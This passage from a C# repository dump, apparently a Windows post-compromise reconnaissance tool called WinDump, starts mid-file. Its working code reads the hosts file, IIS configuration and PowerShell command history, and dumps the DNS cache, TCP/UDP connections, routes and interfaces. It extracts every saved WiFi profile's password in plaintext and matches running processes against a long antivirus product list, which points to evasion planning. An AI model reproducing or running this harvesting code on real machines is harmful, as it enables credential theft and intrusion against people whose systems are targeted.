| } 23 | } 24 | internal static string Hosts() 25 | { 26 | return DumpFile(@"%windir%\system32\drivers\etc\hosts", out var _); 27 | } 28 | internal static string IIS() 29 | { 30 | // >=IIS7 31 | var iis7 = DumpFile(@"%windir%\system32\inetsrv\config\ApplicationHost.config", out var ok); 32 | if (ok) return iis7; 33 | // IIS6 34 | var iis6 = DumpFile(@"%windir%\system32\inetsrv\MetaBase.xml", out ok); 35 | if (ok) 36 | { 37 | return iis6; 38 | } 39 | else 40 | { 41 | return iis7 + "\n" + iis6; 42 | } 43 | } 44 | internal static string Powershell() { 45 | return DumpFile(@"%appdata%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt", out var _); 46 | } 47 | } 48 | } 49 | -------------------------------------------------------------------------------- /LICENSE.txt: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) [year] [fullname] 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Network/DNSCache.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.ComponentModel; 4 | using System.Data; 5 | using System.Runtime.InteropServices; 6 | using System.Text; 7 | 8 | namespace WinDump 9 | { 10 | 11 | class DNSCache 12 | { 13 | internal static Dictionary DnsTypes = new Dictionary { 14 | {0x1,"A"}, 15 | {0x2,"NS"}, 16 | {0x3,"MD"}, 17 | {0x4,"MF"}, 18 | {0x5,"CNAME"}, 19 | {0x6,"SOA"}, 20 | {0x7,"MB"}, 21 | {0x8,"MG"}, 22 | {0x9,"MR"}, 23 | {0xA,"NULL"}, 24 | {0xB,"WKS"}, 25 | {0xC,"PTR"}, 26 | {0xD,"HINFO"}, 27 | {0xE,"MINFO"}, 28 | {0xF,"MX"}, 29 | {0x10,"TEXT"}, 30 | {0x11,"RP"}, 31 | {0x12,"AFSDB"}, 32 | {0x13,"X25"}, 33 | {0x14,"ISDN"}, 34 | {0x15,"RT"}, 35 | {0x16,"NSAP"}, 36 | {0x17,"NSAPPTR"}, 37 | {0x18,"SIG"}, 38 | {0x19,"KEY"}, 39 | {0x1A,"PX"}, 40 | {0x1B,"GPOS"}, 41 | {0x1C,"AAAA"}, 42 | {0x1D,"LOC"}, 43 | {0x1E,"NXT"}, 44 | {0x1F,"EID"}, 45 | {0x20,"NIMLOC"}, 46 | {0x21,"SRV"}, 47 | {0x22,"ATMA"}, 48 | {0x23,"NAPTR"}, 49 | {0x24,"KX"}, 50 | {0x25,"CERT"}, 51 | {0x26,"A6"}, 52 | {0x27,"DNAME"}, 53 | {0x28,"SINK"}, 54 | {0x29,"OPT"}, 55 | {0x2B,"DS"}, 56 | {0x2E,"RRSIG"}, 57 | {0x2F,"NSEC"}, 58 | {0x30,"DNSKEY"}, 59 | {0x31,"DHCID"}, 60 | {0x64,"UINFO"}, 61 | {0x65,"UID"}, 62 | {0x66,"GID"}, 63 | {0x67,"UNSPEC"}, 64 | {0xF8,"ADDRS"}, 65 | {0xF9,"TKEY"}, 66 | {0xFA,"TSIG"}, 67 | {0xFB,"IXFR"}, 68 | {0xFC,"AFXR"}, 69 | {0xFD,"MAILB"}, 70 | {0xFE,"MAILA"}, 71 | {0xFF,"ALL"}, 72 | {0xFF01,"WINS"}, 73 | {0xFF02,"WINSR"}, 74 | }; 75 | internal static DataTable GetDNSCache() 76 | { 77 | try 78 | { 79 | var dt = Utils.Query("Select Name, Type, TimeToLive, Data From MSFT_DNSClientCache WHERE Status = 0", Utils.StandardCimv2); 80 | foreach (DataRow row in dt.Rows) 81 | { 82 | try 83 | { 84 | var typ = DnsTypes[Convert.ToInt32(row["Type"])]; 85 | row["Type"] = typ.ToString(); 86 | } 87 | catch 88 | { 89 | 90 | } 91 | } 92 | return dt; 93 | } 94 | catch { } 95 | return null; 96 | 97 | } 98 | 99 | } 100 | } 101 | -------------------------------------------------------------------------------- /Network/Interface.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.Net; 5 | using System.Text; 6 | 7 | namespace WinDump 8 | { 9 | class Interface 10 | { 11 | internal static DataTable GetInterface() 12 | { 13 | return Utils.Query("Select Description,InterfaceIndex,IPAddress,IPSubnet,MACAddress,DHCPServer,DNSServerSearchOrder FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled=true"); 14 | } 15 | internal static string GetIP() 16 | { 17 | 18 | var ips = Dns.GetHostAddresses(Dns.GetHostName()); 19 | foreach (var ip in ips) { 20 | if (ip.AddressFamily == System.Net.Sockets.AddressFamily.InterNetwork) { 21 | return ip.ToString(); 22 | } 23 | } 24 | 25 | return ""; 26 | } 27 | 28 | } 29 | } 30 | -------------------------------------------------------------------------------- /Network/Netstat.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.Runtime.InteropServices; 5 | using System.Text; 6 | 7 | namespace WinDump 8 | { 9 | internal class Netstat 10 | { 11 | [DllImport("iphlpapi.dll", SetLastError = true)] 12 | static extern uint GetExtendedTcpTable(IntPtr pTcpTable, ref int dwOutBufLen, bool sort, int ipVersion, TCP_TABLE_CLASS tblClass, uint reserved = 0); 13 | 14 | 15 | [StructLayout(LayoutKind.Sequential)] 16 | public struct MIB_TCPROW_OWNER_PID 17 | { 18 | // DWORD is System.UInt32 in C# 19 | uint state; 20 | System.UInt32 localAddr; 21 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)] 22 | byte[] localPort; 23 | System.UInt32 remoteAddr; 24 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)] 25 | byte[] remotePort; 26 | System.UInt32 owningPid; 27 | 28 | public uint PID 29 | { 30 | get 31 | { 32 | return owningPid; 33 | } 34 | } 35 | 36 | public string State 37 | { 38 | get 39 | { 40 | return new string[] { "", "CLOSED", "LISTEN", "SYN_SENT", "SYN_RCVD", "ESTABLISHED ", "FIN_WAIT1", "FIN_WAIT2", "CLOSE_WAIT", "CLOSING", "LAST_ACK", "TIME_WAIT", "DELETE_TCB" }[this.state]; 41 | } 42 | } 43 | public System.Net.IPAddress LocalAddress 44 | { 45 | get 46 | { 47 | return new System.Net.IPAddress(localAddr); 48 | } 49 | } 50 | 51 | public ushort LocalPort 52 | { 53 | get 54 | { 55 | return BitConverter.ToUInt16( 56 | new byte[2] { localPort[1], localPort[0] }, 0); 57 | } 58 | } 59 | 60 | public System.Net.IPAddress RemoteAddress 61 | { 62 | get 63 | { 64 | return new System.Net.IPAddress(remoteAddr); 65 | } 66 | } 67 | 68 | public ushort RemotePort 69 | { 70 | get 71 | { 72 | return BitConverter.ToUInt16( 73 | new byte[2] { remotePort[1], remotePort[0] }, 0); 74 | } 75 | } 76 | } 77 | 78 | [StructLayout(LayoutKind.Sequential)] 79 | public struct MIB_TCPTABLE_OWNER_PID 80 | { 81 | public uint dwNumEntries; 82 | MIB_TCPROW_OWNER_PID table; 83 | } 84 | 85 | enum TCP_TABLE_CLASS 86 | { 87 | TCP_TABLE_BASIC_LISTENER, 88 | TCP_TABLE_BASIC_CONNECTIONS, 89 | TCP_TABLE_BASIC_ALL, 90 | TCP_TABLE_OWNER_PID_LISTENER, 91 | TCP_TABLE_OWNER_PID_CONNECTIONS, 92 | TCP_TABLE_OWNER_PID_ALL, 93 | TCP_TABLE_OWNER_MODULE_LISTENER, 94 | TCP_TABLE_OWNER_MODULE_CONNECTIONS, 95 | TCP_TABLE_OWNER_MODULE_ALL 96 | } 97 | 98 | 99 | 100 | internal static DataTable GetTCP() 101 | { 102 | var dataTable = new DataTable(); 103 | dataTable.Columns.Add("LocalAddress"); 104 | dataTable.Columns.Add("LocalPort"); 105 | dataTable.Columns.Add("RemoteAddress"); 106 | dataTable.Columns.Add("RemotePort"); 107 | dataTable.Columns.Add("State"); 108 | dataTable.Columns.Add("PID"); 109 | // TcpRow is my own class to display returned rows in a nice manner. 110 | // TcpRow[] tTable; 111 | int AF_INET = 2; // IP_v4 112 | int buffSize = 0; 113 | 114 | // how much memory do we need? 115 | uint ret = GetExtendedTcpTable(IntPtr.Zero, ref buffSize, true, AF_INET, TCP_TABLE_CLASS.TCP_TABLE_OWNER_PID_ALL); 116 | IntPtr buffTable = Marshal.AllocHGlobal(buffSize); 117 | 118 | try 119 | { 120 | ret = GetExtendedTcpTable(buffTable, ref buffSize, true, AF_INET, TCP_TABLE_CLASS.TCP_TABLE_OWNER_PID_ALL); 121 | if (ret != 0) 122 | { 123 | return dataTable; 124 | } 125 | 126 | // get the number of entries in the table 127 | //MibTcpTable tab = (MibTcpTable)Marshal.PtrToStructure(buffTable, typeof(MibTcpTable)); 128 | MIB_TCPTABLE_OWNER_PID tab = (MIB_TCPTABLE_OWNER_PID)Marshal.PtrToStructure(buffTable, typeof(MIB_TCPTABLE_OWNER_PID)); 129 | //IntPtr rowPtr = (IntPtr)((long)buffTable + Marshal.SizeOf(tab.numberOfEntries) ); 130 | IntPtr rowPtr = (IntPtr)((long)buffTable + Marshal.SizeOf(tab.dwNumEntries)); 131 | // buffer we will be returning 132 | //tTable = new TcpRow[tab.numberOfEntries]; 133 | 134 | //for (int i = 0; i < tab.numberOfEntries; i++) 135 | for (int i = 0; i < tab.dwNumEntries; i++) 136 | { 137 | //MibTcpRow_Owner_Pid tcpRow = (MibTcpRow_Owner_Pid)Marshal.PtrToStructure(rowPtr, typeof(MibTcpRow_Owner_Pid)); 138 | MIB_TCPROW_OWNER_PID tcpRow = (MIB_TCPROW_OWNER_PID)Marshal.PtrToStructure(rowPtr, typeof(MIB_TCPROW_OWNER_PID)); 139 | //tTable[i] = new TcpRow(tcpRow); 140 | dataTable.Rows.Add(tcpRow.LocalAddress, tcpRow.LocalPort, tcpRow.RemoteAddress, tcpRow.RemotePort, tcpRow.State, tcpRow.PID); 141 | rowPtr = (IntPtr)((long)rowPtr + Marshal.SizeOf(tcpRow)); // next entry 142 | } 143 | 144 | } 145 | finally 146 | { 147 | // Free the Memory 148 | Marshal.FreeHGlobal(buffTable); 149 | } 150 | return dataTable; 151 | } 152 | [DllImport("iphlpapi.dll", SetLastError = true)] 153 | static extern uint GetExtendedUdpTable(IntPtr pTcpTable, ref int dwOutBufLen, bool sort, int ipVersion, UDP_TABLE_CLASS tblClass, uint reserved = 0); 154 | 155 | 156 | [StructLayout(LayoutKind.Sequential)] 157 | public struct MIB_UDPROW_OWNER_PID 158 | { 159 | // DWORD is System.UInt32 in C# 160 | System.UInt32 localAddr; 161 | [MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)] 162 | byte[] localPort; 163 | System.UInt32 owningPid; 164 | 165 | public uint PID 166 | { 167 | get 168 | { 169 | return owningPid; 170 | } 171 | } 172 | 173 | public System.Net.IPAddress LocalAddress 174 | { 175 | get 176 | { 177 | return new System.Net.IPAddress(localAddr); 178 | } 179 | } 180 | 181 | public ushort LocalPort 182 | { 183 | get 184 | { 185 | return BitConverter.ToUInt16( 186 | new byte[2] { localPort[1], localPort[0] }, 0); 187 | } 188 | } 189 | public override string ToString() 190 | { 191 | return string.Format("UDP\t{0}:{1}\t*:*\t\t{2}", this.LocalAddress, this.LocalPort, this.PID); 192 | } 193 | } 194 | 195 | [StructLayout(LayoutKind.Sequential)] 196 | public struct MIB_UDPTABLE_OWNER_PID 197 | { 198 | public uint dwNumEntries; 199 | MIB_UDPROW_OWNER_PID table; 200 | } 201 | 202 | enum UDP_TABLE_CLASS 203 | { 204 | UDP_TABLE_BASIC, 205 | UDP_TABLE_OWNER_PID, 206 | UDP_TABLE_OWNER_MODULE 207 | } 208 | 209 | 210 | internal static DataTable GetUDP() 211 | { 212 | 213 | int AF_INET = 2; // IP_v4 214 | int buffSize = 0; 215 | var dataTable = new DataTable(); 216 | dataTable.Columns.Add("LocalAddress"); 217 | dataTable.Columns.Add("LocalPort"); 218 | dataTable.Columns.Add("PID"); 219 | uint ret = GetExtendedUdpTable(IntPtr.Zero, ref buffSize, true, AF_INET, UDP_TABLE_CLASS.UDP_TABLE_OWNER_PID); 220 | IntPtr buffTable = Marshal.AllocHGlobal(buffSize); 221 | 222 | try 223 | { 224 | ret = GetExtendedUdpTable(buffTable, ref buffSize, true, AF_INET, UDP_TABLE_CLASS.UDP_TABLE_OWNER_PID); 225 | if (ret != 0) 226 | { 227 | return dataTable; 228 | } 229 | 230 | // get the number of entries in the table 231 | //MibTcpTable tab = (MibTcpTable)Marshal.PtrToStructure(buffTable, typeof(MibTcpTable)); 232 | MIB_UDPTABLE_OWNER_PID tab = (MIB_UDPTABLE_OWNER_PID)Marshal.PtrToStructure(buffTable, typeof(MIB_UDPTABLE_OWNER_PID)); 233 | //IntPtr rowPtr = (IntPtr)((long)buffTable + Marshal.SizeOf(tab.numberOfEntries) ); 234 | IntPtr rowPtr = (IntPtr)((long)buffTable + Marshal.SizeOf(tab.dwNumEntries)); 235 | // buffer we will be returning 236 | //tTable = new TcpRow[tab.numberOfEntries]; 237 | 238 | //for (int i = 0; i < tab.numberOfEntries; i++) 239 | for (int i = 0; i < tab.dwNumEntries; i++) 240 | { 241 | //MibTcpRow_Owner_Pid tcpRow = (MibTcpRow_Owner_Pid)Marshal.PtrToStructure(rowPtr, typeof(MibTcpRow_Owner_Pid)); 242 | MIB_UDPROW_OWNER_PID udpRow = (MIB_UDPROW_OWNER_PID)Marshal.PtrToStructure(rowPtr, typeof(MIB_UDPROW_OWNER_PID)); 243 | //tTable[i] = new TcpRow(tcpRow); 244 | rowPtr = (IntPtr)((long)rowPtr + Marshal.SizeOf(udpRow)); // next entry 245 | dataTable.Rows.Add(udpRow.LocalAddress, udpRow.LocalPort,udpRow.PID); 246 | } 247 | 248 | } 249 | finally 250 | { 251 | // Free the Memory 252 | Marshal.FreeHGlobal(buffTable); 253 | } 254 | 255 | 256 | 257 | return dataTable; 258 | } 259 | 260 | } 261 | } 262 | -------------------------------------------------------------------------------- /Network/Route.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.ComponentModel; 4 | using System.Data; 5 | using System.Runtime.InteropServices; 6 | using System.Text; 7 | 8 | namespace WinDump 9 | { 10 | 11 | internal class Routing 12 | { 13 | [StructLayout(LayoutKind.Sequential)] 14 | public struct MIB_IPFORWARDROW 15 | { 16 | [MarshalAs(UnmanagedType.U4)] 17 | public uint dwForwardDest; // IP addr of destination 18 | [MarshalAs(UnmanagedType.U4)] 19 | public uint dwForwardMask; // subnetwork mask of destination 20 | [MarshalAs(UnmanagedType.U4)] 21 | public int dwForwardPolicy; // conditions for multi-path route 22 | [MarshalAs(UnmanagedType.U4)] 23 | public uint dwForwardNextHop; // IP address of next hop 24 | [MarshalAs(UnmanagedType.U4)] 25 | public int dwForwardIfIndex; // index of interface 26 | [MarshalAs(UnmanagedType.U4)] 27 | public int dwForwardType; // route type 28 | [MarshalAs(UnmanagedType.U4)] 29 | public int dwForwardProto; // protocol that generated route 30 | [MarshalAs(UnmanagedType.U4)] 31 | public int dwForwardAge; // age of route 32 | [MarshalAs(UnmanagedType.U4)] 33 | public int dwForwardNextHopAS; // autonomous system number 34 | [MarshalAs(UnmanagedType.U4)] 35 | public int dwForwardMetric1; // protocol-specific metric 36 | [MarshalAs(UnmanagedType.U4)] 37 | public int dwForwardMetric2; // protocol-specific metric 38 | [MarshalAs(UnmanagedType.U4)] 39 | public int dwForwardMetric3; // protocol-specific metric 40 | [MarshalAs(UnmanagedType.U4)] 41 | public int dwForwardMetric4; // protocol-specific metric 42 | [MarshalAs(UnmanagedType.U4)] 43 | public int dwForwardMetric5; // protocol-specific metric 44 | public System.Net.IPAddress ForwardDest 45 | { 46 | get 47 | { 48 | return new System.Net.IPAddress(dwForwardDest); 49 | } 50 | } 51 | public System.Net.IPAddress ForwardNextHop 52 | { 53 | get 54 | { 55 | return new System.Net.IPAddress(dwForwardNextHop); 56 | } 57 | } 58 | public System.Net.IPAddress ForwardMask 59 | { 60 | get 61 | { 62 | return new System.Net.IPAddress(dwForwardMask); 63 | } 64 | } 65 | } 66 | 67 | [DllImport("IpHlpApi.dll")] 68 | [return: MarshalAs(UnmanagedType.U4)] 69 | static extern int GetIpForwardTable(IntPtr pIpForwardTable, [MarshalAs(UnmanagedType.U4)] ref int pdwSize, bool bOrder); 70 | const int ERROR_INSUFFICIENT_BUFFER = 122; 71 | 72 | internal static DataTable GetRoute() 73 | { 74 | var dataTable = new DataTable(); 75 | // The number of bytes needed. 76 | int bytesNeeded = 0; 77 | // The result from the API call. 78 | int result = GetIpForwardTable(IntPtr.Zero, ref bytesNeeded, false); 79 | 80 | // Call the function, expecting an insufficient buffer. 81 | if (result != ERROR_INSUFFICIENT_BUFFER) 82 | { 83 | // Throw an exception. 84 | throw new Win32Exception(result); 85 | } 86 | 87 | // Allocate the memory, do it in a try/finally block, to ensure 88 | // that it is released. 89 | IntPtr buffer = IntPtr.Zero; 90 | 91 | try 92 | { 93 | // Allocate the memory. 94 | buffer = Marshal.AllocCoTaskMem(bytesNeeded); 95 | 96 | // Make the call again. If it did not succeed, then 97 | // raise an error. 98 | result = GetIpForwardTable(buffer, ref bytesNeeded, false); 99 | 100 | // If the result is not 0 (no error), then throw an exception. 101 | if (result != 0) 102 | { 103 | // Throw an exception. 104 | throw new Win32Exception(result); 105 | } 106 | 107 | // Now we have the buffer, we have to marshal it. We can read 108 | // the first 4 bytes to get the length of the buffer. 109 | int entries = Marshal.ReadInt32(buffer); 110 | 111 | // Increment the memory pointer by the size of the int. 112 | IntPtr currentBuffer = new IntPtr(buffer.ToInt64() + Marshal.SizeOf(new int())); 113 | 114 | // Allocate an array of entries. 115 | ; 116 | dataTable.Columns.Add("ForwardDest"); 117 | dataTable.Columns.Add("ForwardMask"); 118 | dataTable.Columns.Add("ForwardNextHop"); 119 | dataTable.Columns.Add("ForwardIfIndex"); 120 | 121 | // Cycle through the entries. 122 | for (int index = 0; index < entries; index++) 123 | { 124 | // Call PtrToStructure, getting the structure information. 125 | MIB_IPFORWARDROW table = (MIB_IPFORWARDROW)Marshal.PtrToStructure(new 126 | IntPtr(currentBuffer.ToInt64() + (index * 127 | Marshal.SizeOf(typeof(MIB_IPFORWARDROW)))), typeof(MIB_IPFORWARDROW)); 128 | dataTable.Rows.Add(table.ForwardDest, table.ForwardMask, table.ForwardNextHop,table.dwForwardIfIndex); 129 | } 130 | 131 | } 132 | finally 133 | { 134 | // Release the memory. 135 | Marshal.FreeCoTaskMem(buffer); 136 | } 137 | return dataTable; 138 | } 139 | 140 | } 141 | } 142 | -------------------------------------------------------------------------------- /Network/WIFI.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.Runtime.InteropServices; 5 | using System.Text; 6 | using System.Xml; 7 | 8 | namespace WinDump 9 | { 10 | internal class WIFI 11 | { 12 | internal static DataTable GetWIFI() 13 | { 14 | DataTable dt = new DataTable(); 15 | dt.Columns.Add("SSID"); 16 | dt.Columns.Add("Pwd"); 17 | const int dwClientVersion = 2; 18 | IntPtr clientHandle = IntPtr.Zero; 19 | IntPtr pdwNegotiatedVersion = IntPtr.Zero; 20 | IntPtr pInterfaceList = IntPtr.Zero; 21 | WLAN_INTERFACE_INFO_LIST interfaceList; 22 | WLAN_PROFILE_INFO_LIST wifiProfileList; 23 | Guid InterfaceGuid; 24 | IntPtr pAvailableNetworkList = IntPtr.Zero; 25 | string wifiXmlProfile = null; 26 | IntPtr wlanAccess = IntPtr.Zero; 27 | IntPtr profileList = IntPtr.Zero; 28 | string profileName = ""; 29 | try 30 | { 31 | // Open Wifi Handle 32 | WlanOpenHandle(dwClientVersion, IntPtr.Zero, out pdwNegotiatedVersion, ref clientHandle); 33 | 34 | WlanEnumInterfaces(clientHandle, IntPtr.Zero, ref pInterfaceList); 35 | interfaceList = new WLAN_INTERFACE_INFO_LIST(pInterfaceList); 36 | InterfaceGuid = interfaceList.InterfaceInfo[0].InterfaceGuid; 37 | WlanGetProfileList(clientHandle, InterfaceGuid, IntPtr.Zero, ref profileList); 38 | wifiProfileList = new WLAN_PROFILE_INFO_LIST(profileList); 39 | if (wifiProfileList.dwNumberOfItems <= 0) return null; 40 | 41 | 42 | for (int i = 0; i < wifiProfileList.dwNumberOfItems; i++) 43 | { 44 | try 45 | { 46 | profileName = (wifiProfileList.ProfileInfo[i]).strProfileName; 47 | int decryptKey = 63; 48 | WlanGetProfile(clientHandle, InterfaceGuid, profileName, IntPtr.Zero, out wifiXmlProfile, ref decryptKey, out wlanAccess); 49 | XmlDocument xmlProfileXml = new XmlDocument(); 50 | xmlProfileXml.LoadXml(wifiXmlProfile); 51 | XmlNodeList pathToSSID = xmlProfileXml.SelectNodes("//*[name()='WLANProfile']/*[name()='SSIDConfig']/*[name()='SSID']/*[name()='name']"); 52 | XmlNodeList pathToPassword = xmlProfileXml.SelectNodes("//*[name()='WLANProfile']/*[name()='MSM']/*[name()='security']/*[name()='sharedKey']/*[name()='keyMaterial']"); 53 | foreach (XmlNode ssid in pathToSSID) 54 | { 55 | 56 | foreach (XmlNode password in pathToPassword) 57 | { 58 | dt.Rows.Add(ssid.InnerText, password.InnerText); 59 | 60 | } 61 | 62 | } 63 | } 64 | catch 65 | { 66 | } 67 | } 68 | WlanCloseHandle(clientHandle, IntPtr.Zero); 69 | } 70 | catch { } 71 | return dt; 72 | } 73 | [DllImport("Wlanapi.dll")] 74 | public static extern int WlanOpenHandle(int dwClientVersion, IntPtr pReserved, [Out] out IntPtr pdwNegotiatedVersion, ref IntPtr ClientHandle); 75 | 76 | [DllImport("Wlanapi", EntryPoint = "WlanCloseHandle")] 77 | public static extern uint WlanCloseHandle([In] IntPtr hClientHandle, IntPtr pReserved); 78 | 79 | 80 | [DllImport("Wlanapi", EntryPoint = "WlanEnumInterfaces")] 81 | public static extern uint WlanEnumInterfaces([In] IntPtr hClientHandle, IntPtr pReserved, ref IntPtr ppInterfaceList); 82 | 83 | 84 | [DllImport("wlanapi.dll", SetLastError = true)] 85 | public static extern uint WlanGetProfile([In] IntPtr clientHandle, [In, MarshalAs(UnmanagedType.LPStruct)] Guid interfaceGuid, [In, MarshalAs(UnmanagedType.LPWStr)] string profileName, [In] IntPtr pReserved, [Out, MarshalAs(UnmanagedType.LPWStr)] out string profileXml, [In, Out, Optional] ref int flags, [Out, Optional] out IntPtr pdwGrantedAccess); 86 | 87 | [DllImport("wlanapi.dll", SetLastError = true, CallingConvention = CallingConvention.Winapi)] 88 | public static extern uint WlanGetProfileList([In] IntPtr clientHandle, [In, MarshalAs(UnmanagedType.LPStruct)] Guid interfaceGuid, [In] IntPtr pReserved, ref IntPtr profileList); 89 | [StructLayout(LayoutKind.Sequential)] 90 | public struct WLAN_INTERFACE_INFO_LIST 91 | { 92 | 93 | public int dwNumberofItems; 94 | public int dwIndex; 95 | public WLAN_INTERFACE_INFO[] InterfaceInfo; 96 | 97 | 98 | public WLAN_INTERFACE_INFO_LIST(IntPtr pList) 99 | { 100 | dwNumberofItems = (int)Marshal.ReadInt64(pList, 0); 101 | dwIndex = (int)Marshal.ReadInt64(pList, 4); 102 | InterfaceInfo = new WLAN_INTERFACE_INFO[dwNumberofItems]; 103 | for (int i = 0; i < dwNumberofItems; i++) 104 | { 105 | IntPtr pItemList = new IntPtr(pList.ToInt64() + (i * 532) + 8); 106 | WLAN_INTERFACE_INFO wii = new WLAN_INTERFACE_INFO(); 107 | wii = (WLAN_INTERFACE_INFO)Marshal.PtrToStructure(pItemList, typeof(WLAN_INTERFACE_INFO)); 108 | InterfaceInfo[i] = wii; 109 | } 110 | } 111 | } 112 | 113 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 114 | public struct WLAN_INTERFACE_INFO 115 | { 116 | public Guid InterfaceGuid; 117 | 118 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 256)] 119 | public string strInterfaceDescription; 120 | 121 | } 122 | 123 | [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] 124 | public struct WLAN_PROFILE_INFO 125 | { 126 | [MarshalAs(UnmanagedType.ByValTStr, SizeConst = 256)] 127 | public string strProfileName; 128 | public WlanProfileFlags ProfileFLags; 129 | } 130 | 131 | [Flags] 132 | public enum WlanProfileFlags 133 | { 134 | AllUser = 0, 135 | GroupPolicy = 1, 136 | User = 2 137 | } 138 | 139 | public struct WLAN_PROFILE_INFO_LIST 140 | { 141 | public int dwNumberOfItems; 142 | public int dwIndex; 143 | public WLAN_PROFILE_INFO[] ProfileInfo; 144 | 145 | public WLAN_PROFILE_INFO_LIST(IntPtr ppProfileList) 146 | { 147 | dwNumberOfItems = (int)Marshal.ReadInt64(ppProfileList); 148 | dwIndex = (int)Marshal.ReadInt64(ppProfileList, 4); 149 | ProfileInfo = new WLAN_PROFILE_INFO[dwNumberOfItems]; 150 | IntPtr ppProfileListTemp = new IntPtr(ppProfileList.ToInt64() + 8); 151 | 152 | for (int i = 0; i < dwNumberOfItems; i++) 153 | { 154 | ppProfileList = new IntPtr(ppProfileListTemp.ToInt64() + i * Marshal.SizeOf(typeof(WLAN_PROFILE_INFO))); 155 | ProfileInfo[i] = (WLAN_PROFILE_INFO)Marshal.PtrToStructure(ppProfileList, typeof(WLAN_PROFILE_INFO)); 156 | } 157 | } 158 | } 159 | } 160 | } 161 | -------------------------------------------------------------------------------- /Process.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Data; 4 | using System.Text; 5 | 6 | namespace WinDump 7 | { 8 | class Process 9 | { 10 | static DataTable cacheProcess; 11 | internal static DataTable GetProcess() 12 | { 13 | if (cacheProcess == null) 14 | { 15 | cacheProcess = Utils.Query("Select Name,Processid,SessionId,ExecutablePath,CommandLine FROM Win32_Process"); 16 | } 17 | return cacheProcess; 18 | } 19 | internal static DataTable GetService() 20 | { 21 | return Utils.Query("SELECT Name,ProcessId,State,DisplayName,PathName FROM Win32_Service"); 22 | } 23 | 24 | internal static DataTable GetAV() 25 | { 26 | 27 | var process = GetProcess(); 28 | var dt = process.Clone(); 29 | var col = dt.Columns.Add("AV"); 30 | col.SetOrdinal(0); 31 | 32 | foreach (DataRow row in process.Rows) 33 | { 34 | var name = row["name"].ToString(); 35 | if (av.ContainsKey(name)) 36 | { 37 | var avname = av[name]; 38 | row.ItemArray.Clone(); 39 | var objs = new object[row.ItemArray.Length + 1]; 40 | objs[0] = avname; 41 | row.ItemArray.CopyTo(objs, 1); 42 | dt.Rows.Add(objs); 43 | } 44 | 45 | } 46 | return dt; 47 | } 48 | 49 | static Dictionary av = new Dictionary { 50 | {"aylaunch.exe", "ALYac"}, 51 | {"ayupdate2.exe", "ALYac"}, 52 | {"AYRTSrv.exe", "ALYac"}, 53 | {"AYAgent.exe", "ALYac"}, 54 | {"AVGSvc.exe", "AVG"}, 55 | {"AVGUI.exe", "AVG"}, 56 | {"avgwdsvc.exe", "AVG"}, 57 | {"avg.exe", "AVG"}, 58 | {"avgaurd.exe", "AVG"}, 59 | {"avgemc.exe", "AVG"}, 60 | {"avgrsx.exe", "AVG"}, 61 | {"avgserv.exe", "AVG"}, 62 | {"avgw.exe", "AVG"}, 63 | {"arsm.exe", "Acronis"}, 64 | {"acronis_license_service.exe", "Acronis"}, 65 | {"AdAwareService.exe", "Ad-Aware"}, 66 | {"Ad-Aware.exe", "Ad-Aware"}, 67 | {"AdAware.exe", "Ad-Aware"}, 68 | {"patray.exe", "AhnLab-V3"}, 69 | {"V3Svc.exe", "AhnLab-V3"}, 70 | {"arcavir.exe", "Arcabit"}, 71 | {"arcadc.exe", "Arcabit"}, 72 | {"ArcaVirMaster.exe", "Arcabit"}, 73 | {"ArcaMainSV.exe", "Arcabit"}, 74 | {"ArcaTasksService.exe", "Arcabit"}, 75 | {"ashDisp.exe", "Avast"}, 76 | {"AvastUI.exe", "Avast"}, 77 | {"AvastSvc.exe", "Avast"}, 78 | {"AvastBrowser.exe", "Avast"}, 79 | {"AfwServ.exe", "Avast"}, 80 | {"avcenter.exe", "Avira AntiVirus(小红伞)"}, 81 | {"avguard.exe", "Avira AntiVirus(小红伞)"}, 82 | {"avgnt.exe", "Avira AntiVirus(小红伞)"}, 83 | {"sched.exe", "Avira AntiVirus(小红伞)"}, 84 | {"BaiduSdSvc.exe", "Baidu AntiVirus"}, 85 | {"BaiduSdTray.exe", "Baidu AntiVirus"}, 86 | {"BaiduSd.exe", "Baidu AntiVirus"}, 87 | {"bddownloader.exe", "百度卫士 or Baidu AntiVirus"}, 88 | {"baiduansvx.exe", "百度卫士-主进程 or Baidu AntiVirus"}, 89 | {"Bdagent.exe", "BitDefender"}, 90 | {"BitDefenderCom.exe", "BitDefender"}, 91 | {"vsserv.exe", "BitDefender"}, 92 | {"bdredline.exe", "BitDefender"}, 